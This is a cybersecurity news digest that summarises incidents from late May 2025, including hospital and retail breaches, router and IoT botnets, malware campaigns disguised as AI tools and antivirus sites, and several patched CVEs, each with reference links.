CyberSecurity news

FlagThis

@WhatIs //
A cyberattack struck Covenant Health on Monday, May 26, 2025, disrupting operations at St. Joseph Hospitals in Bangor, Maine, and Nashua, New Hampshire, as well as St. Mary’s Health System and Community Clinics in Lewiston, Maine. The healthcare provider, a Catholic-based nonprofit serving New England and parts of Pennsylvania, was forced to shut down all data systems across its hospitals, clinics, and provider practices as a protective measure against the "cyber incident initiated by an outside group." This action has impacted access to electronic records, appointment scheduling, and internal communications, leading to connectivity issues throughout the organization.

The cyberattack has led to significant operational disruptions at the affected facilities. In both Bangor and Nashua, ambulance services have been diverted, and diagnostic scans have been redirected to other locations. Patients have reported difficulties in refilling prescriptions, and outpatient lab services at St. Joseph Hospital in Nashua are now only available on the main hospital campus with a physical order in hand. Staff are working under modified procedures to maintain patient care amidst the system outages. The hospitals have posted notices on their websites acknowledging the disruptions and assuring the public that teams are working to restore full services as quickly as possible.

Covenant Health spokesperson Karen Sullivan confirmed that cybersecurity experts have been engaged to investigate the breach and assist in restoring system functionality. While a timeline for full restoration has not been provided, the organization emphasizes that patient care remains a priority. Cybersecurity analysts are warning that medical institutions are increasingly vulnerable to cyberattacks due to the high value of patient data on illicit markets, stressing the urgent need for enhanced digital defenses across the healthcare sector. The incident is currently under investigation, and updates will be provided as more information becomes available.

Recommended read:
References :
  • DataBreaches.Net: Possible ransomware attack disrupts Maine and New Hampshire Covenant Health locations
  • The Dysruption Hub: Cyberattack Disrupts Operations at St. Joseph Hospitals in Maine and New Hampshire
  • WhatIs: Covenant Health cyberattack disrupts New England hospitals

@securityonline.info //
Multiple local vulnerabilities have been discovered in the Kea DHCP server suite, impacting default installations on Linux and BSD distributions. A report by the SUSE Security Team highlighted these flaws during a routine code review, before the system was due to ship in their products. Among the issues is a critical local root exploit that allows an unprivileged user to inject a hook library, leading to arbitrary code execution with root privileges. Other vulnerabilities include the ability to overwrite configuration files via the config-write command, as well as hash denial-of-service issues.

The set-config REST API command presents a significant security risk, as it grants complete control over the configuration of the kea-ctrl-agent and individual Kea services. This control allows for a trivial local privilege escalation by configuring a hook library accessible to an unprivileged user. The vulnerabilities were found in Kea release 2.6.1, but it is believed that older releases are also affected. The report also details seven security issues including local-privilege-escalation and arbitrary file overwrite vulnerabilities.

The Internet Systems Consortium (ISC) has addressed these vulnerabilities by releasing security fixes in all currently supported release series of Kea: 2.4.2, 2.6.3, and 2.7.9. These updates were made available on May 28, 2025, and users are strongly advised to update their Kea DHCP server installations immediately. CVE numbers CVE-2025-32801, CVE-2025-32802, and CVE-2025-32803 have been assigned to the vulnerabilities, with some CVEs covering multiple security flaws.

Recommended read:
References :

@www.pcrisk.com //
A sophisticated multi-stage malware campaign is exploiting the growing interest in AI video generation tools to distribute the Noodlophile information stealer. Cybercriminals are using social media platforms like Facebook and LinkedIn to post malicious ads that lure users to fake websites promising AI video generation services. These websites, designed to mimic legitimate AI tools such as Luma AI, Canva Dream Lab, and Kling AI, instead deliver a range of malware including infostealers, Trojans, and backdoors. The campaign has been active since mid-2024, with thousands of malicious ads reaching millions of unsuspecting users.

The attackers, identified as the Vietnamese-speaking threat group UNC6032, utilize a complex infrastructure to evade detection. They constantly rotate the domains used in their ads and create new ads daily, using both compromised and newly created accounts. Once a user clicks on a malicious ad and visits a fake website, they are led through a deceptive process that appears to generate an AI video. However, instead of receiving a video, the user is prompted to download a ZIP file containing malware. Executing this file compromises the device, potentially logging keystrokes, scanning for password managers and digital wallets, and installing backdoors.

The malware deployed in this campaign includes the STARKVEIL dropper, which then deploys the XWorm and FROSTRIFT backdoors, and the GRIMPULL downloader. The Noodlophile stealer itself is designed to extract sensitive information such as login credentials, cookies, and credit card data, which is then exfiltrated through Telegram. Mandiant Threat Defense reports that these attacks have resulted in the theft of personal information and are concerned that the stolen data is likely sold on illegal online markets. Users are urged to exercise caution and verify the legitimacy of AI tools before using them.

Recommended read:
References :
  • www.pcrisk.com: Noodlophile Stealer Removal Guide
  • Malwarebytes: Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • PCMag UK security: Cybercriminals are capitalizing on interest in AI video tools by posting malware-laden ads on Facebook and LinkedIn, according to Google's thread intelligence unit.
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • PCMag Middle East ai: Be Careful With Facebook Ads for AI Video Generators: They Could Be Malware
  • The Register - Security: Millions may fall for it - and end up with malware instead A group of miscreants tracked as UNC6032 is exploiting interest in AI video generators by planting malicious ads on social media platforms to steal credentials, credit card details, and other sensitive info, according to Mandiant.
  • cloud.google.com: Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus.
  • Threat Intelligence: Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites

@www.microsoft.com //
References: www.microsoft.com
Microsoft is aggressively integrating artificial intelligence across its products and services, striving to revolutionize the user experience. The company is focused on developing agentic systems that can work independently, proactively identify problems, suggest solutions, and maintain context across interactions. Microsoft envisions a future where AI agents will augment and amplify organizational capabilities, leading to significant transformations in various fields. To facilitate secure and flexible interactions, Microsoft is employing Model Context Protocol (MCP) to enable AI models to interact with external services.

As AI agents become more sophisticated and integrated into business processes, Microsoft recognizes the importance of evolving identity standards. The company is actively working on robust mechanisms to ensure agents can securely access data and act across connected systems, including APIs, code repositories, and enterprise systems. Microsoft emphasizes that industry collaboration on identity standards is crucial for the safe and effective deployment of AI agents.

To aid organizations in safely adopting AI, Microsoft Deputy CISO Yonatan Zunger shares guidance for efficient implementation and defense against evolving identity attack techniques. Microsoft CVP Charles Lamanna offers an AI adoption playbook, emphasizing the importance of "customer obsession" and "extreme ownership" for both startups and large enterprises navigating the age of AI. Lamanna suggests focusing on a few high-impact AI projects instead of spreading resources thinly across numerous pilots.

Recommended read:
References :

Dissent@DataBreaches.Net //
ConnectWise, a prominent IT management software firm, has confirmed a cyberattack that impacted a limited number of its ScreenConnect customers. The company suspects the breach was the work of a sophisticated, state-sponsored actor. According to a brief advisory released by ConnectWise, the company detected suspicious activity within its environment, prompting an immediate investigation. The company emphasizes the seriousness of the incident, and is working diligently to contain the incident.

The firm has engaged Mandiant, a leading forensic expert, to assist in the investigation and provide insights into the nature and scope of the attack. ConnectWise has also reached out to all affected customers, offering support and guidance to mitigate any potential damage. Furthermore, the company is actively coordinating with law enforcement to pursue all available avenues for addressing the cyberattack and holding the perpetrators accountable.

The incident serves as a stark reminder of the increasing threat landscape facing IT infrastructure providers. State-sponsored cyberattacks are often characterized by their advanced techniques, persistence, and significant resources, making them particularly challenging to defend against. ConnectWise's swift response, including engaging forensic experts and collaborating with law enforcement, demonstrates the importance of proactive security measures and incident response planning in today's digital environment.

Recommended read:
References :
  • DataBreaches.Net: ConnectWise suspects cyberattack affecting some ScreenConnect customers was state-sponsored
  • BleepingComputer: ConnectWise breached in cyberattack linked to nation-state hackers
  • The Record: ConnectWise said it “recently learned of suspicious activity†within its environment that it believes “was tied to a sophisticated nation state actor, which affected a very small number of ScreenConnect customers.â€
  • www.techradar.com: ConnectWise hit by nation-state cyberattack, some ScreenConnect customer systems affected
  • securityaffairs.com: ConnectWise suffered a cyberattack carried out by a sophisticated nation state actor
  • The Hacker News: ConnectWise Hit by Cyberattack; Nation-State Actor Suspected in Targeted Breach
  • ciso2ciso.com: ConnectWise Confirms Hack, “Very Small Number” of Customers Affected

CyberNewswire@hackread.com //
SquareX has released new threat research highlighting a sophisticated Fullscreen Browser-in-the-Middle (BitM) attack that targets Apple Safari users. This attack exploits a flaw in the browser's Fullscreen API, allowing attackers to create a convincing fullscreen window that mimics a legitimate login page. By using a remote browser, victims are tricked into interacting with an attacker-controlled browser via a pop-up window, divulging credentials and other sensitive information, thinking they are using a regular browser window. Mandiant has highlighted the increasing use of BitM attacks to steal credentials and gain unauthorized access to enterprise SaaS apps.

The Safari-specific implementation flaw uses the Fullscreen API to create a BitM window in fullscreen mode, concealing the suspicious URL from the parent window. Safari users are particularly vulnerable due to the lack of clear visual indicators when entering fullscreen mode, making it difficult to distinguish between a legitimate page and a fake one. Attackers can easily embed a fake login button within the pop-up window that triggers the Fullscreen API upon being clicked. The current Fullscreen API requires user interaction to trigger fullscreen mode, but it does not specify the type of interaction required.

SquareX disclosed this vulnerability to Apple, but they were informed that there is no plan to address the issue. According to SquareX researchers, the Fullscreen BitM attack highlights architectural and design flaws in browser APIs, specifically the Fullscreen API. They emphasized that users could unknowingly click on a fake button and trigger a fullscreen BitM window, especially in Safari, where the lack of clear fullscreen mode cues allows threat actors to steal user credentials stealthily. This exploit renders existing security solutions obsolete when it comes to detecting this type of BitM attack.

Recommended read:
References :
  • hackernoon.com: Fullscreen BitM Attack Discovered By SquareX Exploits Browser Fullscreen APIs To Steal Credentials
  • cyberinsider.com: Apple Safari Users Vulnerable to Stealthy Browser Attacks
  • BleepingComputer: Apple Safari exposes users to fullscreen browser-in-the-middle attacks
  • CyberInsider: Apple Safari Users Vulnerable to Stealthy Browser Attacks
  • Daily CyberSecurity: Fullscreen BitM Attack Discovered by SquareX Exploits Browser Fullscreen APIs to Steal Credentials in Safari
  • hackread.com: Fullscreen BitM Attack Discovered by SquareX Exploits Browser Fullscreen APIs to Steal Credentials in Safari

Pierluigi Paganini@Security Affairs //
Victoria's Secret has shut down its website and disabled some in-store services following a cybersecurity incident. The lingerie retailer's online presence was temporarily halted during the Memorial Day Weekend, a peak holiday shopping period. While physical Victoria's Secret and PINK retail stores remain open, the company has taken steps to address the issue and has engaged third-party experts to restore operations. They do not know when operations will be back up and running.

The incident has disrupted online returns, fulfillment of recent orders, and the redemption of direct mail coupons, prompting the company to extend its U.S. return window by 30 days and extend expired coupon redemption windows. Victoria's Secret customers have expressed frustration with the lack of updates and difficulty contacting representatives through chat, email, or phone. They are working to fulfill orders placed before Monday.

The cyberattack on Victoria's Secret is part of a disturbing trend targeting global retailers, with recent breaches at Dior, Adidas, Harrods, Co-op, and Marks & Spencer. Experts such as Darren Guccione, CEO of Keeper Security, warn that this may signal that cybercrime groups are now actively targeting U.S. companies. Security professionals urge retailers to adopt proactive strategies like Privileged Access Management (PAM) and multi-factor authentication, while consumers are advised to use password managers and dark web monitoring services to protect themselves.

Recommended read:
References :
  • cyberinsider.com: Victoria’s Secret Shuts Down Website and Store Systems Following Cyberattack
  • securityaffairs.com: Victoria’s Secret ‘s website offline following a cyberattack
  • Davey Winder: Victoria’s Secret Lingerie Site Down — Security Incident Cited
  • SecureWorld News: Victoria's Secret Latest Victim of Cyberattacks
  • Graham Cluley: Victoria's Secret has reportedly suffered a major IT outage due to a cybersecurity "incident."
  • www.cybersecuritydive.com: Victoria's Secret shuts down website in response to security incident
  • techcrunch.com: Victoria’s Secret hit by outages as it battles security incident
  • thecyberexpress.com: Victoria’s Secret Website Down After Security Incident
  • The Record: The Victoria's Secret site now features a brief message to customers explaining that the retailer is "taking steps to address a security incident."

@cyberinsider.com //
Mozilla has released Firefox 139 to address a critical security vulnerability within the libvpx video codec encoder. This flaw, identified as a double-free vulnerability, could potentially lead to memory corruption and allow for arbitrary code execution on affected systems. Security experts are urging users to update to the latest version of Firefox immediately to mitigate the risk.

The vulnerability is particularly concerning because it is a zero-interaction exploit, meaning that an attacker could potentially execute malicious code without any user action beyond normal browsing activity. This underscores the importance of applying the patch as soon as possible to prevent potential compromise. The update aims to protect users from remote code execution attacks that could exploit the flaw in the libvpx codec.

The Cybersecurity community has highlighted the importance of prioritizing critical patches such as this one to defend against exploitation. This vulnerability demonstrates the persistent threat landscape and the need for constant vigilance in maintaining secure systems. By updating to Firefox 139, users can ensure they are protected against this potentially severe vulnerability.

Recommended read:
References :
  • cyberinsider.com: Mozilla Patches Critical libvpx Double-Free Vulnerability in Firefox 139
  • securityonline.info: Firefox Alert: Zero-Interaction Exploit in libvpx Allows Arbitrary Code Execution

Pierluigi Paganini@securityaffairs.com //
GreyNoise researchers have uncovered a significant and stealthy campaign exploiting ASUS routers, leading to the formation of a new botnet dubbed "AyySSHush". This long-running operation has compromised thousands of ASUS routers, with numbers steadily increasing. The attackers are gaining unauthorized, persistent access to the devices, effectively establishing a distributed network of backdoors, potentially laying the foundation for a future, larger botnet.

This attack is achieved through a sophisticated, multi-step exploitation chain, showcasing advanced knowledge of ASUS systems. Initial access is gained through brute-force login attempts and previously undocumented authentication bypasses. Attackers then exploit CVE-2023-39780, a command injection vulnerability, to execute system commands. This allows them to enable SSH access on a custom port and insert an attacker-controlled SSH public key, granting persistent remote access.

The AyySSHush botnet's stealth is enhanced by disabling router logging to evade detection and avoiding the installation of any malware. Crucially, the backdoor is stored in non-volatile memory (NVRAM), ensuring it survives both firmware upgrades and reboots. As of late May 2025, data confirmed that over 9,000 ASUS routers had been compromised. This campaign highlights the critical need for prompt patching of router vulnerabilities to prevent exploitation and botnet recruitment.

Recommended read:
References :
  • cyberinsider.com: A campaign targeting nearly 9,000 ASUS routers globally has given attackers persistent, undetectable access, likely to build a botnet network for future operations.
  • The GreyNoise Blog: GreyNoise uncovers a stealth campaign exploiting ASUS routers, enabling persistent backdoor access via CVE-2023-39780 and unpatched techniques. Learn how attackers evade detection, how GreyNoise discovered it with AI-powered tooling, and what defenders need to know.
  • Blog: ASUS routers exposed to the public Internet are being compromised, with backdoors being installed. Here's how to find impacted assets on your network.
  • www.scworld.com: ASUS router backdoors affect 9K devices, persist after firmware updates
  • securityonline.info: Beyond Malware: Stealthy ASUS Router Exploitation Survives Reboots, Builds Botnet
  • bsky.app: Over 9,000 ASUS routers are compromised by a novel botnet dubbed "AyySSHush" that was also observed targeting SOHO routers from Cisco
  • securityaffairs.com: New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
  • securityonline.info: Beyond Malware: Stealthy ASUS Router Exploitation Survives Reboots, Builds Botnet.
  • CyberInsider: 9,000 ASUS Routers Compromised in Stealthy Backdoor Campaign
  • BleepingComputer: Botnet hacks 9,000+ ASUS routers to add persistent SSH backdoor
  • www.techradar.com: Thousands of Asus routers hacked to create a major botnet planting damaging malware.
  • The Register - Security: 8,000+ Asus routers popped in 'advanced' mystery botnet plot
  • PCMag UK security: Cybercriminals Hack Asus Routers: Here's How to Check If They Got Into Yours
  • eSecurity Planet: Over 9,000 Routers Hijacked: ASUS Users Caught in Ongoing Cyber Operation
  • www.cybersecuritydive.com: Researchers have previously linked the suspected threat actor, dubbed ViciousTrap, to the exploitation of Cisco routers.
  • www.itpro.com: ASUS routers at risk from backdoor vulnerability
  • www.csoonline.com: CSOOnline: New botnet hijacks AI-powered security tool on Asus routers

Pierluigi Paganini@Security Affairs //
The Czech Republic has formally accused China of orchestrating a "malicious cyber campaign" targeting an unclassified communication network within its Ministry of Foreign Affairs. The attacks, attributed to the China-linked APT31 hacking group, are believed to have been ongoing since 2022. This action represents a significant escalation in tensions between the two nations regarding cyber espionage. In response to the detected activity, the Czech government summoned the Chinese ambassador to express its strong condemnation of these hostile actions and to convey the damaging impact on bilateral relations. The European Union has voiced its solidarity with Prague following this announcement, further highlighting the international implications of the cyberattack.

The Czech government, in a formal statement, identified the People's Republic of China as responsible for the cyber campaign. The government believes with a high degree of certainty that APT31, also known as Judgement Panda, Bronze Vinewood or RedBravo, a cyber-espionage group linked to China's Ministry of State Security, was behind the attacks. This group has a history of targeting government and defense supply chains. Czech authorities said the malicious activity “affected an institution designated as Czech critical infrastructure,” and targeted one of the Ministry of Foreign Affairs’ unclassified networks.

The Czech Republic asserts that the cyberattacks violate responsible state behavior in cyberspace, as endorsed by members of the United Nations, and undermine the credibility of China. The government is demanding that China adhere to these norms and refrain from similar activities in the future. The Czech Foreign Affairs Minister stated that the attribution was intended to expose China, “which has long been working to undermine our resilience and democracy". The detection of the attackers during the operation allowed for the implementation of a new communication system for the ministry, significantly strengthening its security.

Recommended read:
References :
  • Lukasz Olejnik: The Czech Republic has accused China of a "malicious cyber campaign" targeting an unclassified communication network at its Foreign Affairs Ministry since 2022, summoning the Chinese ambassador in protest. The EU expressed solidarity with Prague following the announcement.
  • securityaffairs.com: Czech Republic accuses China’s APT31 of a cyberattack on its Foreign Ministry
  • BleepingComputer: Czechia blames China for Ministry of Foreign Affairs cyberattack
  • bsky.app: The Czech Republic says the Chinese-backed APT31 hacking group was behind cyberattacks targeting the country's Ministry of Foreign Affairs and critical infrastructure organizations.
  • The Hacker News: The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs.
  • therecord.media: Czech authorities said they assessed with “a high degree of certainty†that a Chinese cyber-espionage group known as APT31, tried to hack into a government network.
  • mzv.gov.cz: Statement by the Government of the Czech Republic.

@www.trendmicro.com //
A new botnet, dubbed PumaBot, is actively targeting Linux-based IoT devices, posing a significant security risk. This Go-based malware is designed to steal SSH credentials through brute-force attacks, allowing it to spread malicious payloads and illicitly mine cryptocurrency. Unlike other botnets that perform broad internet scans, PumaBot employs a more targeted approach by retrieving lists of IP addresses from its command-and-control (C2) server, enabling it to focus its attacks on specific devices. This approach, coupled with its ability to impersonate legitimate system files, makes PumaBot a stealthy and dangerous threat to embedded Linux systems.

The attack begins with PumaBot attempting to brute-force SSH credentials on targeted devices, aiming to gain unauthorized access. Once inside, it establishes persistence using systemd service files, ensuring it survives reboots and remains active on the compromised device. To further mask its activities, PumaBot disguises itself as a legitimate Redis system file, attempting to blend in with normal system processes. After successfully gaining access to an infected system, it collects and exfiltrates basic system information to the C2 server, where it can receive commands to carry out its malicious objectives.

The primary goal of PumaBot appears to be cryptocurrency mining, as evidenced by the presence of "xmrig" and "networkxm" commands within its code. These commands suggest that compromised devices are being leveraged to generate illicit cryptocurrency gains for the botnet operators. Security experts also observed that the botnet performs checks to avoid honeypots and, curiously, looks for the string "Pumatronix," a surveillance and traffic camera manufacturer, hinting at a targeted or exclusionary approach. The discovery highlights the ongoing need for robust security measures for IoT devices, as they continue to be attractive targets for botnet recruitment and malicious activities.

Recommended read:
References :
  • ciso2ciso.com: New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto – Source:thehackernews.com
  • Anonymous ???????? :af:: New PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto.
  • securityaffairs.com: New PumaBot targets Linux IoT surveillance devices
  • The Hacker News: New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto
  • BleepingComputer: A newly discovered Go-based Linux botnet malware named PumaBot is brute-forcing SSH credentials on embedded IoT devices to deploy malicious payloads.
  • gbhackers.com: New PumaBot Hijacks IoT Devices via SSH Brute-Force for Persistent Access
  • www.csoonline.com: Novel PumaBot slips into IoT surveillance with stealthy SSH break-ins

info@thehackernews.com (The@The Hacker News //
A new cyber threat has emerged, with the threat actor known as Mimo exploiting a recently disclosed remote code execution vulnerability, CVE-2025-32432, in the Craft Content Management System (CMS). The attackers are leveraging this vulnerability to deploy a suite of malicious payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware on compromised websites. This allows them to not only abuse system resources for illicit cryptocurrency mining, but also monetize the victim's internet bandwidth for other malicious activities.

The exploitation of CVE-2025-32432 unfolds in two phases. The attacker activates a web shell by injecting PHP code via a specially crafted GET request. This action triggers a redirection, prompting the application to record the return URL within a server-side PHP session file. Once the web shell is enabled, commands can be executed remotely. The web shell is used to download and execute a shell script, which checks for indicators of prior infection and uninstalls any existing cryptocurrency miners before delivering next-stage payloads and launching the Mimo Loader.

The Mimo Loader modifies "/etc/ld.so.preload" to hide the malware process. Its ultimate goal is to deploy the IPRoyal proxyware and the XMRig miner on the compromised host. Sekoia researchers Jeremy Scion and Pierre Le Bourhis noted the unusual naming choice of the Python library "urllib2" being aliased as "fbi," suggesting it may be a tongue-in-cheek nod to the American federal agency, serving as a distinctive coding choice and a potential indicator for detection. The activity has been linked to the Mimo intrusion set, which has been active since at least March 2022 and has previously exploited vulnerabilities in Apache Log4j, Atlassian Confluence, PaperCut, and Apache ActiveMQ.

Recommended read:
References :
  • blog.sekoia.io: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites
  • The Hacker News: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware
  • securityonline.info: Mimo Returns: CVE-2025-32432 Exploited in Cryptomining and Proxyware Campaigns
  • ciso2ciso.com: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware – Source:thehackernews.com
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites The operators appear to be based in the Middle East
  • Virus Bulletin: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.

Pierluigi Paganini@Security Affairs //
Cybercriminals are using a fake Bitdefender website to distribute the Venom RAT (Remote Access Trojan) and other malicious programs, tricking users into downloading what they believe is legitimate antivirus software. The spoofed domain, bitdefender-download[.]com, closely mimics the official Bitdefender site, making it difficult for unsuspecting users to distinguish between the real and fake versions. This campaign highlights the importance of verifying the legitimacy of software download sources to avoid becoming a victim of malware.

Researchers have found that clicking on the "Download for Windows" button on the fraudulent site initiates a file download from a Bitbucket repository that redirects to an Amazon S3 bucket. The downloaded ZIP archive, named "BitDefender.zip," contains an executable ("StoreInstaller.exe") which includes malware configurations associated with Venom RAT, as well as code related to the open-source post-exploitation framework SilentTrinity and StormKitty stealer. These tools work in concert to compromise user systems.

The Venom RAT allows attackers to harvest data and maintain persistent remote access to compromised systems. Additionally, the StormKitty malware steals passwords, including those for cryptocurrency wallets, while SilentTrinity ensures the attacker can remain hidden and maintain long-term control. DomainTools suspects the fake Bitdefender site was likely used in phishing attacks, given its overlap with internet infrastructure hosting other fake sites impersonating banks and IT services, further emphasizing the malicious intent behind this cloned website.

Recommended read:
References :
  • securityaffairs.com: Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
  • The Hacker News: Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
  • PCMag UK security: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware
  • www.pcmag.com: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware | PCMag

@www.microsoft.com //
IACR News has highlighted recent advancements in post-quantum cryptography, essential for safeguarding data against future quantum computer attacks. A key area of focus is the development of algorithms and protocols that remain secure even when classical cryptographic methods become vulnerable. Among these efforts, FrodoKEM stands out as a conservative quantum-safe cryptographic algorithm, designed to provide strong security guarantees in the face of quantum computing threats.

The adaptive security of key-unique threshold signatures is also under scrutiny. Research presented by Elizabeth Crites, Chelsea Komlo, and Mary Mallere, investigates the security assumptions required to prove the adaptive security of threshold signatures. Their work reveals impossibility results that highlight the difficulty of achieving adaptive security for key-unique threshold signatures, particularly for schemes compatible with standard, single-party signatures like BLS, ECDSA, and Schnorr. This research aims to guide the development of new assumptions and properties for constructing adaptively secure threshold schemes.

In related news, Muhammed F. Esgin is offering PhD and Post-Doc positions in post-quantum cryptography, emphasizing the need for candidates with a strong mathematical and cryptography background. Students at Monash University can expect to work on their research from the beginning, supported by competitive stipends and opportunities for teaching assistant roles. These academic opportunities are crucial for training the next generation of cryptographers who will develop and implement post-quantum solutions.

Recommended read:
References :
  • mfesgin.github.io: PhD and Post-Doc in Post-Quantum Cryptography
  • IACR News: Zero-Trust Post-quantum Cryptography Implementation Using Category Theory

djohnson@CyberScoop //
Mandiant, in collaboration with Google Cloud, has uncovered a cybercriminal campaign exploiting public interest in AI video generation. A group tracked as UNC6032, believed to be based in Vietnam, is spreading malware through fake advertisements, websites, and social media posts that promise access to popular prompt-to-video AI tools like Luma AI, Canva Dream Lab, and Kling AI. These malicious campaigns are designed to trick users into downloading infostealers and backdoors, compromising their devices and data.

UNC6032 has successfully reached millions of users across various social media platforms, including Facebook and LinkedIn, with thousands of malicious ads. These advertisements lure victims to phishing pages disguised as legitimate AI video generators. When users click on the "Start Free Now" button, they are led through a bogus video generation interface. After watching a fake loading bar, the site delivers a ZIP file containing malware. Once executed, this malware backdoors the victim's device and steals sensitive information.

Compromised users have experienced the theft of login credentials, cookies, credit card data, and even Facebook information. Mandiant's research indicates that this scheme impacts a wide range of industries and geographic areas. Researchers caution users to be wary of advertisements promising free access to premium software and to verify the legitimacy of video sources before running any PowerShell scripts or downloading files from unknown URLs.

Recommended read:
References :
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • The Register - Security: Don't click on that Facebook ad for a text-to-AI-video tool
  • PCMag UK security: Warning AI-Generated TikTok Videos Want to Trick You Into Installing Malware
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • Malwarebytes: Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • www.techradar.com: Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware
  • CyberInsider: CyberInsider: Cybercriminals Use Fake AI Video Tools to Deliver Infostealers
  • The Hacker News: Reports on the use of fake installers for popular AI tools to spread ransomware and malware.
  • Metacurity: Metacurity for a concise rundown of the most critical developments you should know, including UNC6032 uses prompt-to-video AI tools to lure malware victims
  • PCMag UK security: Cybercriminals have been posting Facebook ads for fake AI video generators to distribute malware, Google’s threat intelligence unit Mandiant .
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake “AI video generator†websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • hackread.com: Fake ChatGPT and InVideo AI Downloads Deliver Ransomware
  • PCMag Middle East ai: Be Careful With Facebook Ads for AI Video Generators: They Could Be Malware
  • Threat Intelligence: Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites
  • ciso2ciso.com: Cybercriminals Target AI Users with Malware-Loaded Installers Posing as Popular Tools

@cyberinsider.com //
Adidas has confirmed a data breach impacting customer data via a third-party customer service provider. According to Adidas, the compromised data primarily consists of contact information of customers who had previously contacted their customer service help desk. The company assures that sensitive information like passwords, credit card, or any other payment-related information were not affected in the incident.

Adidas became aware that an unauthorized external party obtained certain consumer data through a third-party customer service provider. Adidas has immediately taken steps to contain the incident and launched a comprehensive investigation, collaborating with leading information security experts. The company is currently notifying affected customers and is cooperating with data protection authorities and investigators as required by law.

This breach marks the third publicly acknowledged incident involving the sportswear giant’s customer service systems recently. The company is working to clarify the situation, reinforcing the importance of securing third-party providers to prevent them from becoming a gateway for attackers to access target systems. Adidas expressed that they remain fully committed to protecting the privacy and security of their consumers and sincerely regret any inconvenience or concern caused by this incident.

Recommended read:
References :
  • cyberinsider.com: Adidas Hit by Third Customer Data Breach Linked to Support Systems
  • The Register - Security: Adidas confirms criminals stole data from customer service provider
  • The420.in: Adidas Falls Victim to Cyberattack Amid Retail Industry Wave
  • BleepingComputer: Adidas warns of data breach after customer service provider hack
  • www.it-daily.net: Data leak at Adidas: contact data tapped via third-party providers
  • bsky.app: German sportswear giant Adidas disclosed a data breach after attackers hacked a customer service provider and stole some customers' data.
  • Graham Cluley: Adidas customers’ personal information at risk after data breach
  • hackread.com: Adidas Confirms Cyber Attack, Customer Data Stolen
  • hackread.com: Adidas Confirms Cyber Attack, Customer Data Stolen
  • www.bleepingcomputer.com: Adidas warns of data breach after customer service provider hack
  • Graham Cluley: Adidas customers' personal information at risk after third-party data breach.
  • bsky.app: Adidas customers' personal information at risk after third-party data breach.
  • techinformed.com: Adidas becomes latest consumer brand to be hit with a cyber breach
  • www.techradar.com: Adidas confirms customer data stolen in worrying cyberattack
  • www.techdigest.tv: Adidas customer data stolen in latest retail cyber attack
  • PCMag UK security: Adidas Confirms Data Breach, Customer Contact Details Exposed
  • Rescana: April 2025 Adidas Data Breach: Supply Chain Attack via Third-Party Customer Service Provider
  • ComputerWeekly.com: Adidas confirms customer data was accessed during cyber attack

gallagherseanm@Sophos News //
DragonForce ransomware actors are actively exploiting vulnerabilities in SimpleHelp, a remote monitoring and management (RMM) tool, to target Managed Service Providers (MSPs) and their customers. Sophos MDR recently responded to an incident where a threat actor gained access to an MSP's SimpleHelp instance. The attackers then leveraged this access to deploy DragonForce ransomware across multiple endpoints and exfiltrate sensitive data, employing a double extortion tactic to pressure victims into paying a ransom. Sophos endpoint protection and MDR actions were able to thwart a ransomware and double extortion attempt on one customer’s network, highlighting the importance of robust security measures.

The attackers are chaining multiple vulnerabilities to gain access. Sophos MDR has medium confidence that the threat actor exploited a chain of vulnerabilities that were released in January 2025, including CVE-2024-57727 (Multiple path traversal vulnerabilities), CVE-2024-57728 (Arbitrary file upload vulnerability), and CVE-2024-57726 (Privilege escalation vulnerability). The attackers also used their access through the MSP's RMM instance to gather information on multiple customer estates managed by the MSP, including collecting device names and configuration, users, and network connections.

